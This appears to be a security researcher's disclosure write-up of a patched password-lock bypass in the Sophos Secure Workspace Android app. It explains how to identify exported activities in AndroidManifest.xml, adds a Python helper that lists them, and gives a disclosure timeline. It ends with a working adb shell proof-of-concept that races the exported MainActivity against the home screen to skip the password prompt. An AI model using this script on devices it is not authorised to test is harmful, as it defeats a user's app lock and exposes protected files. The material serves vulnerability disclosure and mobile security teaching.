Sophos Secure Workspace App Password Bypass using Race Condition
- Sophos quickly resolved this issue on September 27th 2021.
An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen.
During a mobile penetration engagement, I always check which app components are exported, meaning they can be called directly by other applications. In some cases these exported components can be used as leverage to bypass app restrictions ;)
Identifying Exported Activities
You can look for exported activities in the app's AndroidManifest.xml. An activity is exported:
- if it has android:exported="true"
- if android:exported is missing but the activity has at least one intent-filter
Here is an example of an exported activity:
<activity android:exported="true" android:name="com.app.damnvulnerablebank.SendMoney">
Exported activity with an intent filter (exported because android:exported is absent and an intent-filter is present):
<activity android:name="com.app.damnvulnerablebank.SplashScreen">
    <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
    </intent-filter>
</activity>
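To make the two manifest rules above concrete, here is an added example (not code from the original post) that applies them to a manifest and lists every activity other apps can start; the sample manifest is constructed for the demonstration.

```python
# Added example: list activities that are reachable from other apps by applying
# the two AndroidManifest.xml rules described above.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if it is absent."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def exported_activities(manifest_xml):
    """Return (activity name, reason) for every exported activity.

    Rule 1: android:exported="true".
    Rule 2: android:exported absent but at least one <intent-filter> present
            (the pre-Android 12 default; API 31+ requires an explicit value
            whenever intent filters exist, so a missing attribute there is a
            build error rather than an implicit export).
    """
    root = ET.fromstring(manifest_xml)
    found = []
    for act in root.iter("activity"):
        name = _attr(act, "name")
        exported = _attr(act, "exported")
        has_filter = act.find("intent-filter") is not None
        if exported == "true":
            found.append((name, 'android:exported="true"'))
        elif exported is None and has_filter:
            found.append((name, "no android:exported but has intent-filter"))
    return found


# Constructed sample manifest (not a real app's manifest); package name taken
# from the examples in the post.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.app.damnvulnerablebank">
  <application>
    <activity android:exported="true" android:name="com.app.damnvulnerablebank.SendMoney"/>
    <activity android:name="com.app.damnvulnerablebank.SplashScreen">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name="com.app.damnvulnerablebank.Settings"/>
    <activity android:exported="false" android:name="com.app.damnvulnerablebank.Vault">
      <intent-filter><action android:name="com.app.damnvulnerablebank.OPEN_VAULT"/></intent-filter>
    </activity>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for name, reason in exported_activities(SAMPLE_MANIFEST):
        print(f"{name}: {reason}")
```

Settings (no attribute, no filter) and Vault (explicitly exported="false") are correctly left out, which is the check a reviewer wants when triaging a manifest by hand.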
You can also use drozer to automate finding exported activities, but I would not recommend relying on it alone, since automated tools are likely to miss something.
I found one, but now what do I do?
Exploitation depends on the functionality of the activity. If the app uses an Android WebView, we may get XSS or an open redirect. If you find an activity that exports or uploads files, we may be able to use it to steal sensitive files, e.g. user tokens and others.
- September 04, 2021 - Reported the vulnerability to Sophos.
- September 09, 2021 - Sophos acknowledges the vulnerability.
- September 27, 2021 - Update 9.7.3115 was released on Google Play fixing the bug.
Advisory and CVE
Proof of Concept
The script below automates the process of exploiting this vulnerability; it alternates between starting the exported MainActivity directly and returning to the home screen to win the race:
#!/bin/sh
adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity
sleep 0.5
adb shell am start -a android.intent.action.MAIN -c android.intent.category.HOME
sleep 0.5
adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity
sleep 0.5
adb shell am start -a android.intent.action.MAIN -c android.intent.category.HOME
sleep 0.5
adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity